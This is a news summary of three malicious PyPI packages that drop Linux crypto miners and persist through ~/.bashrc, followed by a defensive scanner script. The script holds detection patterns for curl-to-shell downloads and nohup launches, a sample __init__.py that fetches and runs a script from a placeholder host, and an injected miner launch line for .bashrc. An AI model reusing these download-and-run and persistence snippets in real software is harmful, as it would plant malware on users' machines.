Beware: 3 Malicious PyPI Packages Found Targeting Linux with Crypto Miners

The Hacker News
Three malicious packages—modularseven, driftme, and catme—were discovered in the Python Package Index (PyPI) repository, garnering a total of 431 downloads in the last month before being removed.
These packages deploy a CoinMiner executable on Linux devices.
The code, embedded in the __init__.py file, fetches a shell script from a remote server, initiating the mining activity with a configuration file and the CoinMiner hosted on GitLab.
The ELF binary file is executed in the background using the nohup command to ensure continuous operation even after the user exits the session.
These packages keep their payload off PyPI entirely, at a remote URL, echoing the method used by the culturestreak package.
Notably, the configuration file is hosted on the domain papiculo[.]net, and the coin mining executables are hosted on a public GitLab repository.
Furthermore, the malicious behavior lives in a shell script rather than in the Python code itself, which helps it evade security software and extends the time the miner runs undetected.
Additionally, the malware ensures persistence and reactivation on the user’s device by inserting malicious commands into the ~/.bashrc file, enabling prolonged covert operations for the attacker’s benefit.
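The two behaviours described above, a download-and-execute step at import time and a persistence line appended to `~/.bashrc`, suggest two defender-side checks. The script below is an added example written for this summary, not code from The Hacker News or from the packages themselves: it scans the text of a package's `__init__.py` for the combination of remote fetch, shell execution, `nohup` and `chmod`, and scans shell-profile lines for background launches from temporary paths. The sample `__init__.py` text and `.bashrc` lines are constructed here, `example.invalid` is a placeholder host, and the rule names and the high/medium/low verdict scheme are assumptions of this example rather than any published detection standard.

```python
import re
from typing import List, Tuple

# Heuristic rules for a package's __init__.py / setup.py. Each entry pairs a
# label with a regex; a single hit is only a hint, the combination is the signal.
SOURCE_RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("remote fetch at import time",
     re.compile(r"\b(urlopen|requests\.get|urlretrieve|curl|wget)\b")),
    ("shell execution",
     re.compile(r"\b(os\.system|subprocess\.(run|Popen|call|check_output))\b")),
    ("background execution via nohup", re.compile(r"\bnohup\b")),
    ("shell profile modification", re.compile(r"\.bashrc|\.profile|\.zshrc")),
    ("marks downloaded file executable", re.compile(r"chmod\s+\+x|os\.chmod")),
]

# Heuristic rules for lines found in a user's shell profile.
PROFILE_RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("background process launched from shell profile",
     re.compile(r"\bnohup\b.*&\s*$")),
    ("network download piped into a shell",
     re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("executable under a temporary path",
     re.compile(r"(/tmp/|/var/tmp/|/dev/shm/)\S+")),
]


def assess_source(text: str) -> Tuple[List[str], str]:
    """Return (matched rule labels, verdict) for package source text.

    Verdict is "high" when the code both fetches something remote and runs a
    shell command (the dropper pattern), "medium" when only one of those or an
    auxiliary indicator is present, and "low" when nothing matches.
    """
    hits = [label for label, rx in SOURCE_RULES if rx.search(text)]
    fetch = "remote fetch at import time" in hits
    execute = "shell execution" in hits
    if fetch and execute:
        verdict = "high"
    elif hits:
        verdict = "medium"
    else:
        verdict = "low"
    return hits, verdict


def scan_shell_profile(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, rule label) for every suspicious profile line."""
    findings: List[Tuple[int, str]] = []
    for number, line in enumerate(lines, start=1):
        for label, rx in PROFILE_RULES:
            if rx.search(line):
                findings.append((number, label))
    return findings


# Constructed sample: mimics the fetch-and-run shape described in the article,
# with a placeholder host. This is scanned as text, never executed.
SUSPICIOUS_INIT = """
import os, subprocess, urllib.request
_url = "https://example.invalid/placeholder.sh"
_dst = "/tmp/.cache/run.sh"
urllib.request.urlretrieve(_url, _dst)
os.chmod(_dst, 0o755)
subprocess.Popen(["nohup", "bash", _dst])
"""

# Constructed sample of an ordinary package __init__.py for comparison.
BENIGN_INIT = """
from .core import Client
__all__ = ["Client"]
"""

# Constructed sample ~/.bashrc: two normal lines and one injected launcher.
BASHRC_SAMPLE = [
    "export PATH=$HOME/.local/bin:$PATH",
    "alias ll='ls -la'",
    "nohup /tmp/.cache/miner --config /tmp/.cache/config.json >/dev/null 2>&1 &",
]


if __name__ == "__main__":
    for name, src in (("suspicious", SUSPICIOUS_INIT), ("benign", BENIGN_INIT)):
        hits, verdict = assess_source(src)
        print(f"{name}: verdict={verdict} hits={hits}")
    for number, label in scan_shell_profile(BASHRC_SAMPLE):
        print(f".bashrc line {number}: {label}")
```

Run it as a file to see both verdicts and the flagged `.bashrc` line; in practice you would feed `assess_source` the contents of each `__init__.py` and `setup.py` in a freshly downloaded wheel or sdist before installing it, and `scan_shell_profile` the lines of `~/.bashrc` on hosts where a suspect package was installed. The rules are deliberately coarse: a legitimate package can call `subprocess`, so the verdict only reaches "high" when fetch and execute appear together in import-time code.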
Link: https://thehackernews.com/2024/01/beware-3-malicious-pypi-packages-found.html

